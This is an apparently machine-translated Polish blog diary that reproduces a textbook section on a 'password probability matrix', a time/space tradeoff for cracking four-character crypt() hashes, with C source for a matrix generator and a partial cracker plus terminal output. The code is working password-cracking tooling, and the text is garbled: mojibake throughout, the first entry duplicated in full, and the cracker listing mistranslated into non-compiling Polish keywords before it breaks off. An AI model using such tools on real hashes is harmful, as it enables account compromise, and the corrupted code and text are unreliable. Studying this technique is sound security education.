Drogi Pami�tniczku …

01.11.2020

Macierz prawdopodobie�stwa has�a

Istnieje kompromis mi�dzy moc� obliczeniow� a przestrzeni� pami�ci, kt�ra istnieje wsz�dzie. Wida� to w najbardziej elementarnych formach informatyki i codzienno�ci. Pliki MP3 wykorzystuj� kompresj� do przechowywania wysokiej jako�ci pliku d�wi�kowego w stosunkowo niewielkiej ilo�ci miejsca, ale zwi�ksza si� zapotrzebowanie na zasoby obliczeniowe. Kalkulatory kieszonkowe wykorzystuj� ten kompromis w innym kierunku, utrzymuj�c tabel� przegl�dow� dla funkcji takich jak sinus i cosinus, aby zapisa� kalkulator w wykonywaniu ci�kich oblicze�. Ten kompromis mo�e by� r�wnie� zastosowany do kryptografii w tak zwanym ataku kompromisowym czas / przestrze�. Chocia� metody Hellmana dla tego typu ataku s� prawdopodobnie bardziej skuteczne, poni�szy kod �r�d�owy powinien by� �atwiejszy do zrozumienia. Og�lna zasada jest zawsze taka sama: spr�buj znale�� s�odki punkt mi�dzy moc� obliczeniow� a przestrzeni� pami�ci, aby wyczerpuj�cy atak si�owy m�g� zosta� zako�czony w rozs�dnym czasie, przy rozs�dnej ilo�ci miejsca. Niestety, dylemat soli nadal b�dzie si� pojawia�, poniewa� ta metoda nadal wymaga pewnej formy przechowywania. Jednak istnieje tylko 4 096 mo�liwych soli z skr�tami hase� w stylu crypt (), wi�c efekt tego problemu mo�na zmniejszy�, zmniejszaj�c wymagan� przestrze� pami�ci na tyle, aby zachowa� rozs�dek pomimo 4096 mno�nika. Ta metoda wykorzystuje form� kompresji stratnej. Zamiast mie� dok�adn� tablic� odno�nik�w, kilka tysi�cy mo�liwych warto�ci zwyk�ego tekstu zostanie zwr�conych po wprowadzeniu skr�tu has�a. Warto�ci te mo�na szybko sprawdzi�, aby uzyska� zbie�no�� na oryginalnym ha�le w postaci zwyk�ego tekstu, a kompresja stratna pozwala na znaczne zmniejszenie przestrzeni. W poni�szym kodzie demonstracyjnym u�ywana jest przestrze� klucza dla wszystkich mo�liwych czteroznakowych hase� (ze sta�� sol�). Potrzebne miejsce do przechowywania jest zmniejszone o 88 procent w por�wnaniu z pe�n� tablic� przegl�dow� mieszania (ze sta�� sol�), a przestrze� klucza, kt�ra musi by� wymuszona przez brute, jest zmniejszona o oko�o 1 018 razy. Przy za�o�eniu 10 000 p�kni�� na sekund�, ta metoda mo�e z�ama� ka�de czteroznakowe has�o (ze sta�� sol�) w czasie poni�ej o�miu sekund, co stanowi znaczne przyspieszenie w por�wnaniu z dwiema godzinami potrzebnymi do wyczerpuj�cego ataku bruteforce tej samej przestrzeni klucza . Ta metoda tworzy tr�jwymiarow� macierz binarn�, kt�ra koreluje cz�ci warto�ci mieszania z cz�ciami warto�ci jawnego tekstu. Na osi x tekst jawny jest podzielony na dwie pary: pierwsze dwa znaki i drugie dwa znaki. Mo�liwe warto�ci s� wyliczone w wektor binarny o d�ugo�ci 952 lub 9,025 bit�w (oko�o 1129 bajt�w). Na osi Y tekst zaszyfrowany jest podzielony na cztery trzy-znakowe kawa�ki. S� one wyliczane w ten sam spos�b w d� kolumn, ale tylko cztery bity trzeciego znaku s� rzeczywi�cie u�ywane. Oznacza to, �e s� 642,4 lub 16 384 kolumny. O� z istnieje po prostu dla utrzymania o�miu r�nych macierzy dwuwymiarowych, wi�c cztery istniej� dla ka�dej pary tekstu jawnego. Podstawow� ide� jest podzielenie tekstu jawnego na dwie sparowane warto�ci, kt�re s� wyliczane wzd�u� wektora. Ka�dy mo�liwy tekst jawny jest zmieszany w tekst zaszyfrowany, a tekst zaszyfrowany jest u�ywany do znalezienia odpowiedniej kolumny macierzy. Nast�pnie bit wyliczenia zwyk�ego tekstu w wierszu macierzy jest w��czony. Gdy warto�ci zaszyfrowanego tekstu zostan� zredukowane do mniejszych kawa�k�w, kolizje s� nieuniknione.

Tekst Jawny : Hash

test : jeHEAX1m66RV.

! J) h : jeHEA38vqlkkQ

".F + : jeHEA1Tbde5FE

"8, J : jeHEAnX8kQK3I

W tym przypadku kolumna dla HEA mia�aby w��czone bity odpowiadaj�ce parom tekstu jawnego te,! J, ". I" 8, poniewa� te pary tekstu jawnego / skr�tu s� dodawane do macierzy. Po ca�kowitym wype�nieniu macierzy, gdy zostanie wprowadzony skr�t, taki jak jeHEA38vqlkkQ, kolumna HEA zostanie sprawdzona, a dwuwymiarowa macierz zwr�ci warto�ci te,! J, ". I" 8 dla pierwszego dwa znaki jawnego tekstu. Istniej� cztery takie macierze dla pierwszych dw�ch znak�w, u�ywaj�ce podci�g�w tekstu zaszyfrowanego od znak�w 2 do 4, 4 do 6, 6, 8 i 8, 10, z kt�rych ka�dy ma inny wektor mo�liwych pierwszych dwucyfrowych warto�ci tekstu jawnego. Ka�dy wektor jest ci�gni�ty i ��czony z bitowym ORAZ. To pozostawi tylko te w��czone bity, kt�re odpowiadaj� parom jawnego tekstu wymienionym jako mo�liwo�ci dla ka�dego podci�gu tekstu zaszyfrowanego. Istniej� r�wnie� cztery takie macierze dla ostatnich dw�ch znak�w tekstu jawnego. Rozmiary matryc zosta�y okre�lone przez zasad� szuflady. Jest to prosta zasada, kt�ra stwierdza: Je�li k + 1 obiekt�w zostanie umieszczonych w polach k, co najmniej jedno z p�l b�dzie zawiera� dwa obiekty. Aby uzyska� najlepsze wyniki, celem jest, aby ka�dy wektor by� troch� mniejszy ni� po�owa pe�nego 1s. Od 954 lub 81.450,625 wpisy b�d� umieszczane w macierzach, wi�c musi by� oko�o dwa razy wi�cej otwor�w, aby osi�gn�� 50-procentowe nasycenie. Poniewa� ka�dy wektor ma 9 025 wpis�w, powinno by� oko�o (954 � 2) / 9025 kolumn. Daje to oko�o 18 000 kolumn. Poniewa� w kolumnach u�ywane s� podci�gi tekstu zaszyfrowanego sk�adaj�ce si� z trzech znak�w, pierwsze dwa znaki i cztery bity z trzeciego znaku s� u�ywane do zapewnienia 642 � 4 lub oko�o 16 tysi�cy kolumn (istniej� tylko 64 mo�liwe warto�ci dla ka�dego znaku skr�tu tekstu zaszyfrowanego) ). Powinno to by� wystarczaj�co blisko, poniewa� gdy bit jest dodawany dwukrotnie, nak�adanie si� jest ignorowane. W praktyce ka�dy wektor okazuje si� by� oko�o 42 procent nasycony 1s. Poniewa� s� cztery wektory wyci�gane dla pojedynczego tekstu zaszyfrowanego, prawdopodobie�stwo dowolnej jednej pozycji wyliczaj�cej o warto�ci 1 w ka�dym wektorze wynosi oko�o 0,424 lub oko�o 3,11 procent. Oznacza to, �e �rednio 9 025 mo�liwo�ci dla pierwszych dw�ch znak�w zwyk�ego tekstu zmniejsza si� o oko�o 97% do 280 mo�liwo�ci. Odbywa si� to r�wnie� dla dw�ch ostatnich znak�w, zapewniaj�c oko�o 2802 lub 78,400 mo�liwych warto�ci tekstu jawnego. Przy za�o�eniu 10 000 p�kni�� na sekund�, ta zmniejszona przestrze� klucza zaj�aby mniej ni� 8 sekund na sprawdzenie. Oczywi�cie s� wady. Po pierwsze, stworzenie matrycy trwa co najmniej tak d�ugo, jak zrobi�by to oryginalny atak si�owy; jest to jednak koszt jednorazowy. Ponadto sole nadal maj� tendencj� do blokowania wszelkiego rodzaju atak�w pami�ciowych, nawet przy zmniejszonych wymaganiach dotycz�cych przestrzeni dyskowej. Poni�sze dwa listingi kodu �r�d�owego mog� by� u�yte do utworzenia macierzy prawdopodobie�stwa has�a i z�amania przy jej pomocy hase�. Pierwsza lista wygeneruje macierz, kt�ra mo�e zosta� u�yta do z�amania wszystkich mo�liwych czteroznakowych hase� solonych je. Druga lista wykorzysta wygenerowan� macierz do faktycznego z�amania has�a.

ppm_gen.c

/*********************************************************\

* Password Probability Matrix * File: ppm_gen.c *

***********************************************************

* *

* Author: Jon Erickson < matrix@phiral.com > *

* Organization: Phiral Research Laboratories *

* *

* This is the generate program for the PPM proof of *

* concept. It generates a file called 4char.ppm, which *

* contains information regarding all possible 4- *

* character passwords salted with 'je'. This file can *

* be used to quickly crack passwords found within this *

* keyspace with the corresponding ppm_crack.c program. *

* *

\*********************************************************/

#define _XOPEN_SOURCE

#include

#include

#include

#define HEIGHT 16384

#define WIDTH 1129

#define DEPTH 8

#define SIZE HEIGHT * WIDTH * DEPTH

/* Map a single hash byte to an enumerated value. */

int enum_hashbyte(char a) {

int i, j;

i = (int)a;

if((i >= 46) && (i <= 57))

j = i - 46;

else if ((i >= 65) && (i <= 90))

j = i - 53;

else if ((i >= 97) && (i <= 122))

j = i - 59;

return j;

}

/* Map 3 hash bytes to an enumerated value. */

int enum_hashtriplet(char a, char b, char c) {

return (((enum_hashbyte(c)%4)*4096)+(enum_hashbyte(a)*64)+enum_hashbyte(b));

}

/* Barf a message and exit. */

void barf(char *message, char *extra) {

printf(message, extra);

exit(1);

}

/* Generate a 4-char.ppm file with all possible 4-char passwords (salted w/ je). */

int main() {

char plain[5];

char *code, *data;

int i, j, k, l;

unsigned int charval, val;

FILE *handle;

if (!(handle = fopen("4char.ppm", "w")))

barf("Error: Couldn't open file '4char.ppm' for writing.\n", NULL);

data = (char *) malloc(SIZE);

if (!(data))

barf("Error: Couldn't allocate memory.\n", NULL);

for(i=32; i<127; i++) {

for(j=32; j<127; j++) {

printf("Adding %c%c** to 4char.ppm..\n", i, j);

for(k=32; k<127; k++) {

for(l=32; l<127; l++) {

plain[0] = (char)i; // Build every

plain[1] = (char)j; // possible 4-byte

plain[2] = (char)k; // password.

plain[3] = (char)l;

plain[4] = '\0';

code = crypt((const char *)plain, (const char *)"je"); // Hash it.

/* Lossfully store statistical info about the pairings. */

val = enum_hashtriplet(code[2], code[3], code[4]); // Store info about

bytes 2-4.

charval = (i-32)*95 + (j-32); // First 2 plaintext bytes

data[(val*WIDTH)+(charval/8)] |= (1<<(charval%8));

val += (HEIGHT * 4);

charval = (k-32)*95 + (l-32); // Last 2 plaintext bytes

data[(val*WIDTH)+(charval/8)] |= (1<<(charval%8));

val = HEIGHT + enum_hashtriplet(code[4], code[5], code[6]); // bytes 4-6

charval = (i-32)*95 + (j-32); // First 2 plaintext bytes

data[(val*WIDTH)+(charval/8)] |= (1<<(charval%8));

val += (HEIGHT * 4);

charval = (k-32)*95 + (l-32); // Last 2 plaintext bytes

data[(val*WIDTH)+(charval/8)] |= (1<<(charval%8));

val = (2 * HEIGHT) + enum_hashtriplet(code[6], code[7], code[8]); //

bytes 6-8

charval = (i-32)*95 + (j-32); // First 2 plaintext bytes

data[(val*WIDTH)+(charval/8)] |= (1<<(charval%8));

val += (HEIGHT * 4);

charval = (k-32)*95 + (l-32); // Last 2 plaintext bytes

data[(val*WIDTH)+(charval/8)] |= (1<<(charval%8));

val = (3 * HEIGHT) + enum_hashtriplet(code[8], code[9], code[10]);

// bytes 8-10

charval = (i-32)*95 + (j-32); // First 2 plaintext chars

data[(val*WIDTH)+(charval/8)] |= (1<<(charval%8));

val += (HEIGHT * 4);

charval = (k-32)*95 + (l-32); // Last 2 plaintext bytes

data[(val*WIDTH)+(charval/8)] |= (1<<(charval%8));

}

}

}

}

printf("finished.. saving..\n");

fwrite(data, SIZE, 1, handle);

free(data);

fclose(handle);

}

Pierwszy fragment kodu, ppm_gen.c, mo�e zosta� u�yty do wygenerowania czteroznakowej macierzy prawdopodobie�stwa has�a, jak pokazano na wyj�ciu poni�ej. Opcja -O3 przekazana do GCC nakazuje jej zoptymalizowa� kod pod k�tem szybko�ci podczas kompilacji

reader@hacking:~/booksrc $ gcc -O3 -o ppm_gen ppm_gen.c -lcrypt

reader@hacking:~/booksrc $ ./ppm_gen

Adding ** to 4char.ppm..

Adding !** to 4char.ppm..

Adding "** to 4char.ppm..

.:[ output trimmed ]:.

Adding ~|** to 4char.ppm..

Adding ~}** to 4char.ppm..

Adding ~~** to 4char.ppm..

finished.. saving..

@hacking:~ $ ls -lh 4char.ppm

-rw-r--r-- 1 142M 2007-09-30 13:56 4char.ppm

reader@hacking:~/booksrc $

Plik 4char.ppm o pojemno�ci 142 MB zawiera lu�ne powi�zania mi�dzy tekstem jawnym a danymi mieszania dla ka�dego mo�liwego czteroznakowego has�a. Te dane mog� by� nast�pnie wykorzystane przez ten nast�pny program do szybkiego z�amania czteroznakowych hase�, kt�re mog�yby udaremni� atak s�ownikowy. Powr�t

01.11.2020

Macierz prawdopodobie�stwa has�a

Istnieje kompromis mi�dzy moc� obliczeniow� a przestrzeni� pami�ci, kt�ra istnieje wsz�dzie. Wida� to w najbardziej elementarnych formach informatyki i codzienno�ci. Pliki MP3 wykorzystuj� kompresj� do przechowywania wysokiej jako�ci pliku d�wi�kowego w stosunkowo niewielkiej ilo�ci miejsca, ale zwi�ksza si� zapotrzebowanie na zasoby obliczeniowe. Kalkulatory kieszonkowe wykorzystuj� ten kompromis w innym kierunku, utrzymuj�c tabel� przegl�dow� dla funkcji takich jak sinus i cosinus, aby zapisa� kalkulator w wykonywaniu ci�kich oblicze�. Ten kompromis mo�e by� r�wnie� zastosowany do kryptografii w tak zwanym ataku kompromisowym czas / przestrze�. Chocia� metody Hellmana dla tego typu ataku s� prawdopodobnie bardziej skuteczne, poni�szy kod �r�d�owy powinien by� �atwiejszy do zrozumienia. Og�lna zasada jest zawsze taka sama: spr�buj znale�� s�odki punkt mi�dzy moc� obliczeniow� a przestrzeni� pami�ci, aby wyczerpuj�cy atak si�owy m�g� zosta� zako�czony w rozs�dnym czasie, przy rozs�dnej ilo�ci miejsca. Niestety, dylemat soli nadal b�dzie si� pojawia�, poniewa� ta metoda nadal wymaga pewnej formy przechowywania. Jednak istnieje tylko 4 096 mo�liwych soli z skr�tami hase� w stylu crypt (), wi�c efekt tego problemu mo�na zmniejszy�, zmniejszaj�c wymagan� przestrze� pami�ci na tyle, aby zachowa� rozs�dek pomimo 4096 mno�nika. Ta metoda wykorzystuje form� kompresji stratnej. Zamiast mie� dok�adn� tablic� odno�nik�w, kilka tysi�cy mo�liwych warto�ci zwyk�ego tekstu zostanie zwr�conych po wprowadzeniu skr�tu has�a. Warto�ci te mo�na szybko sprawdzi�, aby uzyska� zbie�no�� na oryginalnym ha�le w postaci zwyk�ego tekstu, a kompresja stratna pozwala na znaczne zmniejszenie przestrzeni. W poni�szym kodzie demonstracyjnym u�ywana jest przestrze� klucza dla wszystkich mo�liwych czteroznakowych hase� (ze sta�� sol�). Potrzebne miejsce do przechowywania jest zmniejszone o 88 procent w por�wnaniu z pe�n� tablic� przegl�dow� mieszania (ze sta�� sol�), a przestrze� klucza, kt�ra musi by� wymuszona przez brute, jest zmniejszona o oko�o 1 018 razy. Przy za�o�eniu 10 000 p�kni�� na sekund�, ta metoda mo�e z�ama� ka�de czteroznakowe has�o (ze sta�� sol�) w czasie poni�ej o�miu sekund, co stanowi znaczne przyspieszenie w por�wnaniu z dwiema godzinami potrzebnymi do wyczerpuj�cego ataku bruteforce tej samej przestrzeni klucza . Ta metoda tworzy tr�jwymiarow� macierz binarn�, kt�ra koreluje cz�ci warto�ci mieszania z cz�ciami warto�ci jawnego tekstu. Na osi x tekst jawny jest podzielony na dwie pary: pierwsze dwa znaki i drugie dwa znaki. Mo�liwe warto�ci s� wyliczone w wektor binarny o d�ugo�ci 952 lub 9,025 bit�w (oko�o 1129 bajt�w). Na osi Y tekst zaszyfrowany jest podzielony na cztery trzy-znakowe kawa�ki. S� one wyliczane w ten sam spos�b w d� kolumn, ale tylko cztery bity trzeciego znaku s� rzeczywi�cie u�ywane. Oznacza to, �e s� 642,4 lub 16 384 kolumny. O� z istnieje po prostu dla utrzymania o�miu r�nych macierzy dwuwymiarowych, wi�c cztery istniej� dla ka�dej pary tekstu jawnego. Podstawow� ide� jest podzielenie tekstu jawnego na dwie sparowane warto�ci, kt�re s� wyliczane wzd�u� wektora. Ka�dy mo�liwy tekst jawny jest zmieszany w tekst zaszyfrowany, a tekst zaszyfrowany jest u�ywany do znalezienia odpowiedniej kolumny macierzy. Nast�pnie bit wyliczenia zwyk�ego tekstu w wierszu macierzy jest w��czony. Gdy warto�ci zaszyfrowanego tekstu zostan� zredukowane do mniejszych kawa�k�w, kolizje s� nieuniknione.

Tekst Jawny : Hash

test : jeHEAX1m66RV.

! J) h : jeHEA38vqlkkQ

".F + : jeHEA1Tbde5FE

"8, J : jeHEAnX8kQK3I

W tym przypadku kolumna dla HEA mia�aby w��czone bity odpowiadaj�ce parom tekstu jawnego te,! J, ". I" 8, poniewa� te pary tekstu jawnego / skr�tu s� dodawane do macierzy. Po ca�kowitym wype�nieniu macierzy, gdy zostanie wprowadzony skr�t, taki jak jeHEA38vqlkkQ, kolumna HEA zostanie sprawdzona, a dwuwymiarowa macierz zwr�ci warto�ci te,! J, ". I" 8 dla pierwszego dwa znaki jawnego tekstu. Istniej� cztery takie macierze dla pierwszych dw�ch znak�w, u�ywaj�ce podci�g�w tekstu zaszyfrowanego od znak�w 2 do 4, 4 do 6, 6, 8 i 8, 10, z kt�rych ka�dy ma inny wektor mo�liwych pierwszych dwucyfrowych warto�ci tekstu jawnego. Ka�dy wektor jest ci�gni�ty i ��czony z bitowym ORAZ. To pozostawi tylko te w��czone bity, kt�re odpowiadaj� parom jawnego tekstu wymienionym jako mo�liwo�ci dla ka�dego podci�gu tekstu zaszyfrowanego. Istniej� r�wnie� cztery takie macierze dla ostatnich dw�ch znak�w tekstu jawnego. Rozmiary matryc zosta�y okre�lone przez zasad� szuflady. Jest to prosta zasada, kt�ra stwierdza: Je�li k + 1 obiekt�w zostanie umieszczonych w polach k, co najmniej jedno z p�l b�dzie zawiera� dwa obiekty. Aby uzyska� najlepsze wyniki, celem jest, aby ka�dy wektor by� troch� mniejszy ni� po�owa pe�nego 1s. Od 954 lub 81.450,625 wpisy b�d� umieszczane w macierzach, wi�c musi by� oko�o dwa razy wi�cej otwor�w, aby osi�gn�� 50-procentowe nasycenie. Poniewa� ka�dy wektor ma 9 025 wpis�w, powinno by� oko�o (954 � 2) / 9025 kolumn. Daje to oko�o 18 000 kolumn. Poniewa� w kolumnach u�ywane s� podci�gi tekstu zaszyfrowanego sk�adaj�ce si� z trzech znak�w, pierwsze dwa znaki i cztery bity z trzeciego znaku s� u�ywane do zapewnienia 642 � 4 lub oko�o 16 tysi�cy kolumn (istniej� tylko 64 mo�liwe warto�ci dla ka�dego znaku skr�tu tekstu zaszyfrowanego) ). Powinno to by� wystarczaj�co blisko, poniewa� gdy bit jest dodawany dwukrotnie, nak�adanie si� jest ignorowane. W praktyce ka�dy wektor okazuje si� by� oko�o 42 procent nasycony 1s. Poniewa� s� cztery wektory wyci�gane dla pojedynczego tekstu zaszyfrowanego, prawdopodobie�stwo dowolnej jednej pozycji wyliczaj�cej o warto�ci 1 w ka�dym wektorze wynosi oko�o 0,424 lub oko�o 3,11 procent. Oznacza to, �e �rednio 9 025 mo�liwo�ci dla pierwszych dw�ch znak�w zwyk�ego tekstu zmniejsza si� o oko�o 97% do 280 mo�liwo�ci. Odbywa si� to r�wnie� dla dw�ch ostatnich znak�w, zapewniaj�c oko�o 2802 lub 78,400 mo�liwych warto�ci tekstu jawnego. Przy za�o�eniu 10 000 p�kni�� na sekund�, ta zmniejszona przestrze� klucza zaj�aby mniej ni� 8 sekund na sprawdzenie. Oczywi�cie s� wady. Po pierwsze, stworzenie matrycy trwa co najmniej tak d�ugo, jak zrobi�by to oryginalny atak si�owy; jest to jednak koszt jednorazowy. Ponadto sole nadal maj� tendencj� do blokowania wszelkiego rodzaju atak�w pami�ciowych, nawet przy zmniejszonych wymaganiach dotycz�cych przestrzeni dyskowej. Poni�sze dwa listingi kodu �r�d�owego mog� by� u�yte do utworzenia macierzy prawdopodobie�stwa has�a i z�amania przy jej pomocy hase�. Pierwsza lista wygeneruje macierz, kt�ra mo�e zosta� u�yta do z�amania wszystkich mo�liwych czteroznakowych hase� solonych je. Druga lista wykorzysta wygenerowan� macierz do faktycznego z�amania has�a.

ppm_gen.c

/*********************************************************\

* Password Probability Matrix * File: ppm_gen.c *

***********************************************************

* *

* Author: Jon Erickson < matrix@phiral.com > *

* Organization: Phiral Research Laboratories *

* *

* This is the generate program for the PPM proof of *

* concept. It generates a file called 4char.ppm, which *

* contains information regarding all possible 4- *

* character passwords salted with 'je'. This file can *

* be used to quickly crack passwords found within this *

* keyspace with the corresponding ppm_crack.c program. *

* *

\*********************************************************/

#define _XOPEN_SOURCE

#include

#include

#include

#define HEIGHT 16384

#define WIDTH 1129

#define DEPTH 8

#define SIZE HEIGHT * WIDTH * DEPTH

/* Map a single hash byte to an enumerated value. */

int enum_hashbyte(char a) {

int i, j;

i = (int)a;

if((i >= 46) && (i <= 57))

j = i - 46;

else if ((i >= 65) && (i <= 90))

j = i - 53;

else if ((i >= 97) && (i <= 122))

j = i - 59;

return j;

}

/* Map 3 hash bytes to an enumerated value. */

int enum_hashtriplet(char a, char b, char c) {

return (((enum_hashbyte(c)%4)*4096)+(enum_hashbyte(a)*64)+enum_hashbyte(b));

}

/* Barf a message and exit. */

void barf(char *message, char *extra) {

printf(message, extra);

exit(1);

}

/* Generate a 4-char.ppm file with all possible 4-char passwords (salted w/ je). */

int main() {

char plain[5];

char *code, *data;

int i, j, k, l;

unsigned int charval, val;

FILE *handle;

if (!(handle = fopen("4char.ppm", "w")))

barf("Error: Couldn't open file '4char.ppm' for writing.\n", NULL);

data = (char *) malloc(SIZE);

if (!(data))

barf("Error: Couldn't allocate memory.\n", NULL);

for(i=32; i<127; i++) {

for(j=32; j<127; j++) {

printf("Adding %c%c** to 4char.ppm..\n", i, j);

for(k=32; k<127; k++) {

for(l=32; l<127; l++) {

plain[0] = (char)i; // Build every

plain[1] = (char)j; // possible 4-byte

plain[2] = (char)k; // password.

plain[3] = (char)l;

plain[4] = '\0';

code = crypt((const char *)plain, (const char *)"je"); // Hash it.

/* Lossfully store statistical info about the pairings. */

val = enum_hashtriplet(code[2], code[3], code[4]); // Store info about

bytes 2-4.

charval = (i-32)*95 + (j-32); // First 2 plaintext bytes

data[(val*WIDTH)+(charval/8)] |= (1<<(charval%8));

val += (HEIGHT * 4);

charval = (k-32)*95 + (l-32); // Last 2 plaintext bytes

data[(val*WIDTH)+(charval/8)] |= (1<<(charval%8));

val = HEIGHT + enum_hashtriplet(code[4], code[5], code[6]); // bytes 4-6

charval = (i-32)*95 + (j-32); // First 2 plaintext bytes

data[(val*WIDTH)+(charval/8)] |= (1<<(charval%8));

val += (HEIGHT * 4);

charval = (k-32)*95 + (l-32); // Last 2 plaintext bytes

data[(val*WIDTH)+(charval/8)] |= (1<<(charval%8));

val = (2 * HEIGHT) + enum_hashtriplet(code[6], code[7], code[8]); //

bytes 6-8

charval = (i-32)*95 + (j-32); // First 2 plaintext bytes

data[(val*WIDTH)+(charval/8)] |= (1<<(charval%8));

val += (HEIGHT * 4);

charval = (k-32)*95 + (l-32); // Last 2 plaintext bytes

data[(val*WIDTH)+(charval/8)] |= (1<<(charval%8));

val = (3 * HEIGHT) + enum_hashtriplet(code[8], code[9], code[10]);

// bytes 8-10

charval = (i-32)*95 + (j-32); // First 2 plaintext chars

data[(val*WIDTH)+(charval/8)] |= (1<<(charval%8));

val += (HEIGHT * 4);

charval = (k-32)*95 + (l-32); // Last 2 plaintext bytes

data[(val*WIDTH)+(charval/8)] |= (1<<(charval%8));

}

}

}

}

printf("finished.. saving..\n");

fwrite(data, SIZE, 1, handle);

free(data);

fclose(handle);

}

Pierwszy fragment kodu, ppm_gen.c, mo�e zosta� u�yty do wygenerowania czteroznakowej macierzy prawdopodobie�stwa has�a, jak pokazano na wyj�ciu poni�ej. Opcja -O3 przekazana do GCC nakazuje jej zoptymalizowa� kod pod k�tem szybko�ci podczas kompilacji

reader@hacking:~/booksrc $ gcc -O3 -o ppm_gen ppm_gen.c -lcrypt

reader@hacking:~/booksrc $ ./ppm_gen

Adding ** to 4char.ppm..

Adding !** to 4char.ppm..

Adding "** to 4char.ppm..

.:[ output trimmed ]:.

Adding ~|** to 4char.ppm..

Adding ~}** to 4char.ppm..

Adding ~~** to 4char.ppm..

finished.. saving..

@hacking:~ $ ls -lh 4char.ppm

-rw-r--r-- 1 142M 2007-09-30 13:56 4char.ppm

reader@hacking:~/booksrc $

Plik 4char.ppm o pojemno�ci 142 MB zawiera lu�ne powi�zania mi�dzy tekstem jawnym a danymi mieszania dla ka�dego mo�liwego czteroznakowego has�a. Te dane mog� by� nast�pnie wykorzystane przez ten nast�pny program do szybkiego z�amania czteroznakowych hase�, kt�re mog�yby udaremni� atak s�ownikowy. Powr�t

02.11.2020 ppm_crack.c

/ ************************************************* ********

* Matryca prawdopodobie�stwa has�a * Plik: ppm_crack.c *

************************************************** *********

* *

* Autor: Jon Erickson *

* Organizacja: Phiral Research Laboratories *

* *

* Jest to program do sprawdzania poprawno�ci koncepcji PPM. *

* U�ywa istniej�cego pliku o nazwie 4char.ppm, kt�ry *

* zawiera informacje dotycz�ce wszystkich mo�liwych 4- *

* has�a postaci solone za pomoc� "je". Ten plik mo�e *

* by� generowane za pomoc� odpowiedniego programu ppm_gen.c. *

* *

************************************************* ******** /

#define _XOPEN_SOURCE

#include < unistd.h >

#include < stdio.h >

#include < stdlib.h >

#define HEIGHT 16384

#define WIDTH 1129

#define DEPTH 8

#define WYSOKO�� ROZMIARU * SZEROKO�� * G��BOKO��

#define DCM HEIGHT * WIDTH

/ * Odwzoruj pojedynczy bajt skr�tu na wyliczon� warto��. * /

int enum_hashbyte (char a) {

int i, j;

i = (int) a;

je�li ((i> = 46) && (i <= 57))

j = i - 46;

inaczej je�li ((i> = 65) && (i <= 90))

j = i - 53;

else if ((i> = 97) && (i <= 122))

j = i - 59;

return j;

}

/ * Mapowanie 3 bajt�w haszuj�cych na wyliczon� warto��. * /

int enum_hashtriplet (char a, char b, char c) {

return (((enum_hashbyte (c)% 4) * 4096) + (enum_hashbyte (a) * 64) + enum_hashbyte (b));

}

/ * Scal dwa wektory. * /

void merge (char * vector1, char * vector2) {

int i;

dla (i = 0; i
wektor1 [i] & = wektor2 [i];

}

/ * Zwraca bit w wektorze przy przekazanej pozycji indeksu * /

int get_vector_bit (char * vector, int index) {

return ((vector [(index / 8)] & (1 << (index% 8))) >> (indeks% 8));

}

/ * Zlicza liczb� par jawnego tekstu w przekazanym wektorze * /

int count_vector_bits (char * vector) {

int i, count = 0;

dla (i = 0; i <9025; i ++)

count + = get_vector_bit (wektor, i);

liczba zwrot�w;

}

/ * Wy�wietla pary jawnego tekstu, kt�re wylicza ka�dy bit ON w wektorze. * /

void print_vector (char * vector) {

int i, a, b, val;

dla (i = 0; i <9025; i ++) {

if (get_vector_bit (wektor, i) == 1) {// Je�li bit jest w��czony,

a = i / 95; // Oblicz

b = i - (a * 95); // para zwyk�ego tekstu

printf ("% c% c", a + 32, b + 32); // i wydrukuj to.

}

}

printf ("n");

}

/ * Wy�lij wiadomo�� i wyjd�. * /

void barf (char * message, char * extra) {

printf (wiadomo��, extra);

exit (1);

}

/ * Z�am 4-znakowe has�o przy u�yciu wygenerowanego pliku 4char.ppm. * /

int main (int argc, char * argv []) {

char * pass, plain [5];

unsigned char bin_vector1 [WIDTH], bin_vector2 [WIDTH], temp_vector [WIDTH];

char prob_vector1 [2] [9025];

char prob_vector2 [2] [9025];

int a, b, i, j, len, pv1_len = 0, pv2_len = 0;

PLIK * fd;

if (argc <1)

barf ("Spos�b u�ycia:% s (u�yje pliku 4char.ppm) n", argv [0]);

if (! (fd = fopen ("4char.ppm", "r"))))

barf ("Fatal: Nie mo�na otworzy� pliku PPM do odczytu. n", NULL);

pass = argv [1]; // Pierwszy argument to skr�t has�a

printf ("Filtrowanie mo�liwych bajt�w zwyk�ego tekstu dla pierwszych dw�ch znak�w: n");

fseek (fd, (DCM * 0) + enum_hashtriplet (pass [2], pass [3], pass [4]) * WIDTH, SEEK_SET);

fread (bin_vector1, WIDTH, 1, fd); // Odczytaj wektor kojarz�cy bajty 2-4 skr�tu.

len = count_vector_bits (bin_vector1);

printf ("tylko 1 wektor 4:% d par tekstu jawnego, z% 0.2f %% nasycenia n", len,

len * 100,0 /

9025.0);

fseek (fd, (DCM * 1) + enum_hashtriplet (pass [4], pass [5], pass [6]) * WIDTH, SEEK_SET);

fread (temp_vector, WIDTH, 1, fd); // Odczytaj wektor ��cz�cy bajty 4-6 warto�ci mieszania.

scal (bin_vector1, temp_vector); // Scal go z pierwszym wektorem.

len = count_vector_bits (bin_vector1);

printf ("po��czone wektory 1 I 2:% d pary tekstu jawnego, z% 0.2f %% nasycenia n", len,

len * 100,0 / 9025,0);

fseek (fd, (DCM * 2) + enum_hashtriplet (pass [6], pass [7], pass [8]) * WIDTH, SEEK_SET);

fread (temp_vector, WIDTH, 1, fd); // Odczytaj wektor ��cz�cy bajty 6-8 skr�tu.

scal (bin_vector1, temp_vector); // Scal go z pierwszymi dwoma wektorami.

len = count_vector_bits (bin_vector1);

printf ("pierwsze 3 wektory po��czone:% d pary tekstu jawnego, z% 0.2f %% nasycenia n", len,

len * 100,0 / 9025,0);

fseek (fd, (DCM * 3) + enum_hashtriplet (pass [8], pass [9], pass [10]) * WIDTH, SEEK_SET);

fread (temp_vector, WIDTH, 1, fd); // Odczytaj wektor asocjacyjny bajt�w 8-10 warto�ci mieszania.

scal (bin_vector1, temp_vector); // Scal go z wektorami othes.

len = count_vector_bits (bin_vector1);

printf ("wszystkie 4 wektory po��czone:% d pary tekstu jawnego, z% 0.2f %% nasycenia n", len,

len * 100,0 / 9025,0);

printf ("Mo�liwe pary tekstu jawnego dla pierwszych dw�ch bajt�w: n");

print_vector (bin_vector1);

printf ("n Filtrowanie mo�liwych bajt�w zwyk�ego tekstu dla dw�ch ostatnich znak�w: n");

fseek (fd, (DCM * 4) + enum_hashtriplet (pass [2], pass [3], pass [4]) * WIDTH, SEEK_SET);

